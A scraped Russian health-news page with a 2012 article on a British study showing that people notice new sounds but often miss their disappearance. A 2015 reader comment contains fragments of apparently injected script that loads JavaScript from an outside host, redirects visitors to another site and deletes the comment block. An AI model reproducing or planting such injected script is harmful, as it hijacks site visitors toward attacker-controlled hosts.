Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мы не слышим, как исчезаю...  >>  Мы не слышим, как исчезают звуки
 
Обратная связь
 

Мы не слышим, как исчезают звуки

Размер шрифта
19 ноября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Британские ученые установили, что мы всегда обращаем внимание на появление новых звуков, но пропускаем тот момент, когда они исчезают.

мы не слышим как исчезают звуки

Цель исследования

Слух играет важную роль в нашей жизни, поскольку позволяет быстро реагировать на новые события. Действительно, мы можем судить о том или ином явлении по звуку еще до того, как его увидим. Например, сидя спиной к двери, мы узнаем, что кто-то вошел в комнату по звуку шагов. Однако до сих пор неизвестно, почему одни звуки мы воспринимаем четко, а другие – попросту игнорируем. Авторы исследования решили установить, какими преимуществами обладают одни звуки перед другими.

Суть исследования

В ходе проведения исследования участники слышали одновременно несколько звуков и должны были определить, когда появляются или исчезают отдельные звуки. На появление новых звуков участники исследования реагировали безошибочно. Однако определить, когда звук исчезает, оказалось гораздо сложнее. Более чем в половине случаев участники игнорировали исчезновение звуков, а в остальных случаях сообщили об исчезновении звука позже, чем это происходило на самом деле.

Результаты

С одной стороны, можно было ожидать, что участники будут более чувствительны к появлению новых звуков. С точки зрения безопасности важно обратить внимание на появление нового звука, чем на исчезновение старого. Однако существуют ситуации, когда значимость звуков меняется. Достаточно представить, что вы идете с другом по лесу и вдруг перестаете слышать звук его шагов. И таких примеров существует достаточно много.

Полученная информация не только позволяет лучше понять, как мы воспринимаем окружающий мир, но и имеет практическую ценность. В частности, ее можно использовать при создании приборов, которыми пользуются авиадиспетчеры и пилоты, ведь они должны оперативно реагировать на изменение звуков.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
То, что мы слышим, зависит от того, что мы делаем   Что ваши уши говорят о вас?   Как почистить уши и не оглохнуть? Можно ли чистить уши ушными палочками?   Звенит в ушах? Пейте это, и слышите спокойно!  
16 ноября 2012Мы не слышим, как исчезают звуки 16 января 2013То, что мы слышим, зависит от того, что мы делаем
 
25 октября 2012Ученые научили слышать глухих 03 октября 2012Два популярных анальгетика вызывают потерю слуха!
 

Слайдшоу

1
Что делать с ушной серой? ИЗ-ЗА ЧЕГО вы оглохнете?
Все нормально, вы просто стареете Как не оглохнуть на отдыхе
Как оглохнуть навсегда 15 тестов, которые должна сделать каждая женщина
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.